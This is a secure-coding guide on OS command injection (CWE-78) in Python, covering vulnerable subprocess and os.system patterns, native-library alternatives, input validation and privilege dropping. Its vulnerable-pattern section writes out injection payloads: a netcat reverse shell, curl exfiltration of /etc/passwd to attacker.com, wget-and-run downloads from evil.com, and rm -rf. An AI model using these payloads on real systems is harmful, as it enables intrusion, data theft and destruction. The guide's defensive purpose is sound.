CWE-78: OS Command Injection - Python

Overview

OS Command Injection occurs when an application incorporates untrusted data into an operating system command without proper validation or sanitization. Attackers can execute arbitrary commands on the host operating system.

Primary Defense: Use Python native libraries (pathlib, requests, etc.) instead of system commands. If process execution is unavoidable, use subprocess.run() with an argument list and shell=False (never shell=True).

Remediation Strategy

PRIMARY FIX - Avoid System Calls

Use Python native libraries instead of executing commands

This eliminates the vulnerability entirely
Do NOT use subprocess or os.system() if a Python library exists

SECONDARY FIX - Use subprocess.run() with Argument List

Set shell=False, pass arguments as list

WARNING: Only use if the primary fix (Priority 1) is not possible
Arguments must be passed as a list with shell=False (CRITICAL)

Defense in Depth - Input Validation

Allowlist permitted characters

Required in addition to the primary or secondary fix (Priority 1 or 2)
Never rely on validation alone

Additional Hardening - Least Privilege

Drop privileges, use resource limits

Apply alongside other fixes

Decision Tree

Need to execute OS command?
├─ Is there a Python library alternative? (pathlib, requests, etc.)
│  ├─ YES → Use Python library (Priority 1) - PREFERRED SOLUTION
│  └─ NO → Continue
│
├─ Can you use subprocess.run() with argument list?
│  ├─ YES → Use subprocess.run(['cmd', 'arg1', 'arg2'], shell=False) (Priority 2)
│  └─ NO → Re-evaluate if command is truly necessary
│
└─ For ALL solutions:
   ├─ Add input validation (Priority 3)
   └─ Apply least privilege (Priority 4)

Common Vulnerable Patterns

String Concatenation with os.system()

# VULNERABLE - Command injection via string concatenation

filename = request.GET['file']
os.system('ls -la ' + filename)

# Attack example:
# Input: "file.txt; rm -rf /tmp/*"
# Result: Deletes all files in /tmp

Why this is vulnerable: os.system() executes commands through the shell, allowing attackers to inject shell metacharacters like ;, |, &&, or $() to chain commands such as ; rm -rf / or | nc attacker.com 4444 -e /bin/sh, achieving arbitrary code execution.
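
The effect of the injected ; can be inspected without running anything. The sketch below tokenizes the concatenated string with the standard library's shlex in punctuation-aware mode, which only approximates how a POSIX shell splits a command line (it is not the shell's real parser). build_command and shell_tokens are hypothetical helpers written for this illustration.

```python
import shlex

def build_command(filename):
    # Hypothetical helper mirroring the vulnerable pattern: plain string concatenation.
    return 'ls -la ' + filename

def shell_tokens(command):
    # punctuation_chars=True makes shlex emit operators such as ; | && as
    # separate tokens, roughly the way a POSIX shell would see them.
    return list(shlex.shlex(command, posix=True, punctuation_chars=True))

tokens = shell_tokens(build_command('file.txt; rm -rf /tmp/*'))
print(tokens)
```

The ; appears as its own token with rm directly after it, which is why the shell treats the attacker's text as a second command rather than as part of the filename.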

Using subprocess with shell=True

# VULNERABLE - Shell command injection

user_input = request.GET['path']
subprocess.run(f'cat {user_input}', shell=True)

# Attack example:
# Input: "file.txt | curl attacker.com?data=$(cat /etc/passwd)"
# Result: Exfiltrates password file

subprocess.Popen with Shell Invocation

# VULNERABLE - Invoking shell allows command injection

ip = request.GET['ip']
subprocess.Popen(f'ping -c 4 {ip}', shell=True)

# Attack example:
# Input: "8.8.8.8 && cat /etc/shadow > /tmp/pwned"
# Result: Executes additional commands

Why this is vulnerable: subprocess.Popen with shell=True passes the command to the shell, allowing injection of shell operators like &&, ||, or ; to execute arbitrary commands such as && wget http://evil.com/backdoor.sh -O- | sh, creating backdoors or stealing data.

Unvalidated Input in subprocess.call()

# VULNERABLE - No input validation with shell=True

user_file = request.POST['filepath']
subprocess.call('grep pattern ' + user_file, shell=True)

# Attack example:
# Input: "data.txt; wget http://attacker.com/malware.sh -O /tmp/m.sh; sh /tmp/m.sh"
# Result: Downloads and executes malware

Why this is vulnerable: subprocess.call() with shell=True and no validation allows attackers to inject shell metacharacters like ; to chain commands, download malicious scripts with wget or curl, and execute them, compromising the entire system.

Secure Patterns

Use Python Native Libraries (PREFERRED - Eliminates Command Injection)

# SECURE - Use pathlib and os modules instead of OS commands

from pathlib import Path
import os

directory = Path('/uploads')
for file_path in directory.iterdir():
    stat = file_path.stat()
    print(f"{file_path.name} {stat.st_size} {stat.st_mtime}")

# More file operations

import shutil
content = Path(filepath).read_text()           # Instead of "cat"
shutil.copy(source, dest)                      # Instead of "cp"
Path(path).mkdir(parents=True, exist_ok=True)  # Instead of "mkdir -p"
Path(filepath).unlink()                        # Instead of "rm"

Why this works: Python's pathlib and shutil modules operate on the filesystem through library calls inside the Python process, without invoking shell commands. For these operations command injection is eliminated: no child process is spawned, no shell interprets metacharacters like ;, |, or &&, and command chaining is impossible. User-supplied paths still need validation against path traversal. These functions are also more portable across operating systems than system commands.
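
As a minimal sketch of this point, the hypothetical list_directory helper below stands in for an ls -la call and is run against a file whose name contains shell metacharacters. The helper name and the temporary directory are assumptions made for the demonstration.

```python
import tempfile
from pathlib import Path

def list_directory(directory):
    """Return (name, size_in_bytes) pairs for regular files, like a minimal 'ls -la'."""
    entries = []
    for entry in sorted(Path(directory).iterdir()):
        if entry.is_file():
            entries.append((entry.name, entry.stat().st_size))
    return entries

with tempfile.TemporaryDirectory() as tmp:
    # A hostile-looking filename is just data to pathlib; nothing interprets it.
    (Path(tmp) / 'a.txt; rm -rf x').write_text('hello')
    listing = list_directory(tmp)
    print(listing)
```

Because no command line is ever built, the name is returned as an ordinary string.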

Use requests Library for Network Operations

# SECURE - Use requests instead of wget/curl commands

import requests

response = requests.get(url, timeout=30)
content = response.content

# For downloads

with requests.get(url, stream=True, timeout=30) as r:
    r.raise_for_status()
    with open('download.file', 'wb') as f:
        for chunk in r.iter_content(chunk_size=8192):
            f.write(chunk)

Why this works: The requests library performs network operations through pure Python code without executing wget, curl, or other command-line utilities. By eliminating process execution entirely, there's no attack surface for command injection - malicious URLs or parameters cannot escape into shell commands because no shell is ever invoked. The timeout parameter also prevents denial of service through hanging connections.

Use tarfile/zipfile for Archives

# SECURE - Use tarfile module instead of tar commands

import tarfile
from pathlib import Path

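with tarfile.open(archive, 'r:gz') as tar:
    # Safe extraction with path validation
    for member in tar.getmembers():
        # Prevent path traversal
        if member.name.startswith('/') or '..' in member.name:
            raise ValueError(f'Unsafe archive member: {member.name}')
        # Links can point outside the target directory even when the name looks safe
        if member.issym() or member.islnk():
            raise ValueError(f'Link member not allowed: {member.name}')
        tar.extract(member, path='./extracted')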

# For ZIP files

import zipfile
with zipfile.ZipFile(archive, 'r') as zip_ref:
    for member in zip_ref.namelist():
        if member.startswith('/') or '..' in member:
            raise ValueError(f'Unsafe archive member: {member}')
    zip_ref.extractall('./extracted')

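Why this works: Python's tarfile and zipfile modules process archives inside the Python process without calling external tar, unzip, or 7z commands. Even if an attacker controls filenames within the archive, they cannot inject shell commands because no shell is invoked. The path traversal validation (checking for .. and absolute paths) guards against zip slip attacks, providing defense-in-depth. Name checks alone do not cover tar members that are symbolic or hard links, so treat those as unsafe too; on Python 3.12 and later, passing filter='data' to extract() or extractall() applies the standard library's own extraction filter.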
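
A substring test for .. also rejects harmless names such as notes..v2.txt. One possible alternative, sketched below under the assumption that resolving each member against the destination is acceptable, is to compare resolved paths instead. checked_members and make_archive are hypothetical helpers; the archive is built in memory purely for the demonstration and nothing is extracted.

```python
import io
import tarfile
import tempfile
from pathlib import Path

def checked_members(tar, dest):
    """Yield members of `tar` that would land inside `dest`; raise otherwise."""
    dest = Path(dest).resolve()
    for member in tar.getmembers():
        # Links can redirect later writes outside dest, so refuse them outright.
        if member.issym() or member.islnk():
            raise ValueError(f'Link member not allowed: {member.name}')
        target = (dest / member.name).resolve()
        if target != dest and dest not in target.parents:
            raise ValueError(f'Unsafe archive member: {member.name}')
        yield member

def make_archive(names):
    """Build a small in-memory .tar.gz containing the given member names."""
    buffer = io.BytesIO()
    with tarfile.open(fileobj=buffer, mode='w:gz') as tar:
        for name in names:
            data = b'demo'
            info = tarfile.TarInfo(name)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    buffer.seek(0)
    return buffer

with tempfile.TemporaryDirectory() as dest:
    with tarfile.open(fileobj=make_archive(['notes..v2.txt']), mode='r:gz') as tar:
        accepted = [m.name for m in checked_members(tar, dest)]
    print(accepted)
    with tarfile.open(fileobj=make_archive(['../evil.txt']), mode='r:gz') as tar:
        try:
            list(checked_members(tar, dest))
        except ValueError as exc:
            print(exc)
```

In real use, each yielded member would be passed to tar.extract(member, path=dest).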

Use re Module for Text Processing

# SECURE - Use re module instead of grep commands

import re
from pathlib import Path

content = Path(filepath).read_text()
matches = re.findall(pattern, content)

# Line-by-line processing

with open(filepath) as f:
    matching_lines = [line for line in f if search_term in line]

Why this works: Python's re module and file I/O operations provide text processing without executing grep, sed, awk, or other shell utilities. Processing text inside the Python process prevents command injection and behaves the same across platforms. If the pattern itself comes from a user, escape it with re.escape() or restrict it, because untrusted regular expression syntax can trigger excessive backtracking. List comprehensions and regex operations are also easier to maintain than complex shell pipelines.
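
A rough stand-in for grep -F (fixed-string search) might look like the sketch below. grep_lines is a hypothetical helper; it assumes UTF-8 input and treats the search term as literal text by escaping it.

```python
import re
import tempfile
from pathlib import Path

def grep_lines(filepath, search_term):
    """Return lines containing search_term, treated as literal text (like grep -F)."""
    pattern = re.compile(re.escape(search_term))
    with open(filepath, encoding='utf-8') as f:
        return [line.rstrip('\n') for line in f if pattern.search(line)]

with tempfile.TemporaryDirectory() as tmp:
    log_file = Path(tmp) / 'app.log'
    log_file.write_text('error: disk full\nok\nerror.* seen\n', encoding='utf-8')
    literal_hits = grep_lines(log_file, 'error.*')
    hostile_hits = grep_lines(log_file, '; rm -rf /')
    print(literal_hits, hostile_hits)
```

Escaping means error.* matches only the line that contains those exact characters, and a shell-style payload is simply a string that is not found.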

subprocess.run() with Argument List (If Process Execution Required)

WARNING: Avoid executing OS commands if at all possible. Python has native libraries for almost everything (requests, pathlib, zipfile, etc.). This pattern is ONLY for cases where no Python library exists (e.g., calling a legacy third-party binary). Always exhaust all native alternatives first.

# USE WITH CAUTION - When process execution is unavoidable, use argument list

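import ipaddress
import subprocess

ip_address = request.GET['ip']

# Validate input first: ipaddress rejects out-of-range octets (e.g. 999.1.1.1)
# and the trailing newline that a '^...$' regex with re.match would accept
try:
    ipaddress.IPv4Address(ip_address)
except ValueError:
    raise ValueError('Invalid IP address') from None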

# Use list of arguments - NO SHELL
result = subprocess.run(
    ['ping', '-c', '4', ip_address],  # Arguments as list
    capture_output=True,
    text=True,
    shell=False,  # CRITICAL: shell=False
    timeout=10
)

print(result.stdout)

Why this works: Using subprocess.run() with arguments as a list and shell=False passes each argument directly to the executable without shell interpretation. Even if ip_address contains shell metacharacters like ; or &&, they're treated as literal argument data rather than command separators. The shell=False setting is critical: it prevents Python from invoking /bin/sh or cmd.exe, eliminating the shell layer entirely. Input validation provides defense-in-depth by rejecting malformed inputs before they reach subprocess. It also covers a gap the argument list leaves open: a value that begins with - may still be parsed by the target program as an option, so validation must rule that out.
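
The literal-argument behavior can be checked safely by using the Python interpreter itself as the child process. In this sketch, echo_argv is a hypothetical helper and the child program simply prints the one argument it received.

```python
import subprocess
import sys

def echo_argv(value):
    """Run a child Python process that prints the single argument it receives."""
    child_code = 'import sys; print(sys.argv[1])'
    result = subprocess.run(
        [sys.executable, '-c', child_code, value],  # Arguments as list, no shell
        capture_output=True,
        text=True,
        shell=False,
        timeout=10,
        check=True,
    )
    return result.stdout.rstrip('\n')

payload = '8.8.8.8 && cat /etc/shadow > /tmp/pwned'
received = echo_argv(payload)
print(received == payload)
```

The child sees the whole payload as one argument, including && and >, because nothing between Python and the executable interprets those characters.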

subprocess.run() with Path Validation (For File Operations)

WARNING: Use Python's pathlib, shutil, or os modules instead of subprocess for file operations. Only use subprocess for operations with no Python equivalent (e.g., calling external compression tools).

For file operations requiring subprocess - always validate paths.

# AVOID IF POSSIBLE - Validate paths before use

import re
from pathlib import Path

filename = request.GET['file']

# Validate filename (fullmatch: '$' with re.match would allow a trailing newline)
if not re.fullmatch(r'[a-zA-Z0-9._-]+', filename):
    raise ValueError('Invalid filename')

# Better: Use pathlib instead of subprocess
base_dir = Path('/uploads').resolve()
file_path = (base_dir / filename).resolve()
if not file_path.is_relative_to(base_dir):  # Python 3.9+
    raise ValueError('Path traversal detected')

content = file_path.read_text()

Why this works: Using Path.resolve() and is_relative_to() ensures the resolved absolute path stays within the intended directory, preventing path traversal attacks through ../ sequences. The regex validation creates an allowlist of permitted filename characters, blocking shell metacharacters. However, the example emphasizes using pathlib's native file operations (read_text()) instead of subprocess entirely - this is the most secure approach because it avoids process execution altogether.
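
The containment check can be packaged as a reusable function. The sketch below is one possible shape; resolve_under is a hypothetical name, and it compares against Path.parents so that it also runs on Python versions older than 3.9, where is_relative_to() is unavailable.

```python
import tempfile
from pathlib import Path

def resolve_under(base_dir, user_path):
    """Resolve user_path below base_dir, raising if the result escapes it."""
    base = Path(base_dir).resolve()
    # resolve() collapses ../ sequences and follows symlinks before the comparison.
    candidate = (base / user_path).resolve()
    if candidate != base and base not in candidate.parents:
        raise ValueError('Path traversal detected')
    return candidate

with tempfile.TemporaryDirectory() as uploads:
    inside = resolve_under(uploads, 'report.txt')
    print(inside.name)
    for hostile in ('../../etc/passwd', '/etc/passwd'):
        try:
            resolve_under(uploads, hostile)
        except ValueError as exc:
            print(f'{hostile!r}: {exc}')
```

Comparing resolved paths rather than raw strings is what makes the check hold for absolute paths and ../ sequences alike.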

Input Validation (Defense in Depth)

Allowlist Validation

import ipaddress
import re

def validate_filename(filename):
    """Only allow alphanumeric, underscore, dash, dot"""
    # fullmatch avoids the trailing-newline match that '$' permits with re.match
    if not re.fullmatch(r'[a-zA-Z0-9._-]+', filename):
        raise ValueError('Invalid filename characters')
    return filename

def validate_ip_address(ip):
    """Validate IPv4 format"""
    try:
        ipaddress.IPv4Address(ip)
    except ValueError:
        raise ValueError('Invalid IP address') from None
    return ip

Django/Flask Integration

# Django view with validation

import subprocess

from django.core.exceptions import ValidationError
from django.core.validators import validate_ipv4_address
from django.http import HttpResponse, HttpResponseBadRequest

def ping_view(request):
    ip_address = request.GET.get('ip', '')

    try:
        # Built-in validator; rejects out-of-range octets such as 999.1.1.1
        validate_ipv4_address(ip_address)
    except ValidationError:
        return HttpResponseBadRequest('Invalid IP')

    # Safe to use with subprocess
    result = subprocess.run(
        ['ping', '-c', '4', ip_address],
        capture_output=True,
        shell=False
    )
    return HttpResponse(result.stdout)

shlex for Argument Parsing (Use Carefully)

import shlex
import subprocess

# Only use shlex.split() for parsing TRUSTED input
# NOT for untrusted user input directly in commands
# Safe: parsing trusted command template

cmd_template = 'ping -c 4'
args = shlex.split(cmd_template)
args.append(validated_ip)  # Append validated user input
subprocess.run(args, shell=False)

# NEVER do this:
# user_input = request.GET['cmd']
# args = shlex.split(user_input)  # Still vulnerable!
# subprocess.run(args, shell=False)
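
The reason the second pattern stays vulnerable is that shlex.split() only tokenizes; it places no limit on which program or options the tokens name. The sketch below illustrates this without executing anything. ALLOWED_PROGRAMS and build_args are hypothetical names introduced for the example.

```python
import shlex

ALLOWED_PROGRAMS = {'ping'}  # Hypothetical allowlist for this illustration

def build_args(trusted_template, *validated_args):
    """Split a developer-written template, then append already-validated values."""
    args = shlex.split(trusted_template)
    if not args or args[0] not in ALLOWED_PROGRAMS:
        raise ValueError('Program not allowed')
    return args + list(validated_args)

# Attacker-controlled text: no shell is involved, yet the attacker picks the program.
attacker_args = shlex.split('rm -rf /tmp/important')
print(attacker_args[0])

# Trusted template plus a validated value: the program is fixed by the developer.
safe_args = build_args('ping -c 4', '8.8.8.8')
print(safe_args)
```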

Security Best Practices

Use Timeout

try:
    result = subprocess.run(
        ['ping', '-c', '4', ip_address],
        capture_output=True,
        shell=False,
        timeout=10  # Prevent hanging
    )
except subprocess.TimeoutExpired:
    # Handle timeout
    pass
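
The timeout behavior can be exercised with a deliberately slow child process. In this sketch, run_with_timeout is a hypothetical wrapper, and returning None on timeout is an illustrative choice rather than a recommendation.

```python
import subprocess
import sys

def run_with_timeout(args, timeout_seconds):
    """Return the child's stdout, or None if it exceeds the timeout."""
    try:
        result = subprocess.run(
            args,
            capture_output=True,
            text=True,
            shell=False,
            timeout=timeout_seconds,
        )
    except subprocess.TimeoutExpired:
        # subprocess.run() kills the child before raising TimeoutExpired.
        return None
    return result.stdout

slow_child = [sys.executable, '-c', 'import time; time.sleep(30)']
fast_child = [sys.executable, '-c', 'print("ok")']
slow_output = run_with_timeout(slow_child, 0.5)
fast_output = run_with_timeout(fast_child, 10)
print(slow_output, fast_output)
```

A real handler would usually log the timeout and return an error to the caller instead of silently passing.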

Limit Resource Usage

import resource

def limit_process_resources():
    """Limit CPU and memory for subprocess"""
    def set_limits():
        # Limit CPU time to 30 seconds
        resource.setrlimit(resource.RLIMIT_CPU, (30, 30))
        # Limit memory to 128MB
        resource.setrlimit(resource.RLIMIT_AS, (128 * 1024 * 1024, 
                                                  128 * 1024 * 1024))

    return set_limits

# Use preexec_fn (Unix only; the subprocess documentation warns that it is not safe in multithreaded applications)

subprocess.run(
    ['ping', '-c', '4', ip_address],
    preexec_fn=limit_process_resources(),
    shell=False
)

Drop Privileges (Unix)

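import os
import pwd
import subprocess

def drop_privileges(username='nobody'):
    """Drop privileges to specified user"""
    def set_user():
        pw_record = pwd.getpwnam(username)
        os.setgroups([])             # Drop supplementary groups first
        os.setgid(pw_record.pw_gid)  # Group before user: setgid fails once root is dropped
        os.setuid(pw_record.pw_uid)
    return set_user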

# Run subprocess as unprivileged user

subprocess.run(
    ['command'],
    preexec_fn=drop_privileges('nobody'),
    shell=False
)

Verification

After implementing the recommended secure patterns, verify the fix through multiple approaches:

Manual testing: Submit command injection payloads (for example, input containing ;, |, &&, or $(...)) and confirm they are rejected or treated as literal data, with no additional commands executed
Code review: Confirm every call site uses a native Python library or subprocess with an argument list and shell=False, with no string concatenation or f-strings used to build commands
Static analysis: Use security scanners to verify no new vulnerabilities exist and the original finding is resolved
Regression testing: Ensure legitimate user inputs and application workflows continue to function correctly
Edge case validation: Test with special characters, leading dashes, whitespace, newlines, boundary conditions, and unusual inputs to verify proper handling
Framework verification: If using a framework or library, confirm the recommended APIs are used correctly according to documentation
Authentication/session testing: Verify security controls remain effective and cannot be bypassed (if applicable to the vulnerability type)
Rescan: Run the security scanner again to confirm the finding is resolved and no new issues were introduced
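
As a lightweight aid for the code review step, a few lines of ast can flag the most obvious shell-invoking calls. This is a rough sketch and not a substitute for a real scanner: find_shell_calls is a hypothetical helper that only recognizes direct os.system / os.popen calls and a literal shell=True keyword, and it misses aliased imports and computed values.

```python
import ast

SHELL_FUNCTIONS = {('os', 'system'), ('os', 'popen')}

def find_shell_calls(source):
    """Return sorted (line_number, description) pairs for shell-invoking calls."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Call):
            continue
        func = node.func
        if (isinstance(func, ast.Attribute) and isinstance(func.value, ast.Name)
                and (func.value.id, func.attr) in SHELL_FUNCTIONS):
            findings.append((node.lineno, f'{func.value.id}.{func.attr}'))
        for keyword in node.keywords:
            if (keyword.arg == 'shell' and isinstance(keyword.value, ast.Constant)
                    and keyword.value.value is True):
                findings.append((node.lineno, 'shell=True'))
    return sorted(findings)

sample = '''import os, subprocess
os.system('ls -la ' + name)
subprocess.run(f'cat {path}', shell=True)
subprocess.run(['ping', '-c', '4', ip], shell=False)
'''
findings = find_shell_calls(sample)
print(findings)
```

The sample source is only parsed, never executed, so the undefined names in it are harmless.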

Deprecated/Dangerous Functions to Avoid

# NEVER USE THESE:

os.system(cmd)              # Always uses shell
os.popen(cmd)               # Always uses shell
subprocess.getoutput(cmd)   # Always uses shell
commands.getoutput(cmd)     # Python 2 only; removed in Python 3
subprocess.call(cmd, shell=True)
subprocess.Popen(cmd, shell=True)

# IF PROCESS EXECUTION IS UNAVOIDABLE, USE:

subprocess.run([...], shell=False)
subprocess.check_output([...], shell=False)

Additional Resources

Bandit Security Linter - Detects subprocess issues
CWE-78 Definition
OWASP Command Injection
Python Requests Library
Python pathlib Module
Python shutil Module
Python subprocess Documentation
Python tarfile Module
Python zipfile Module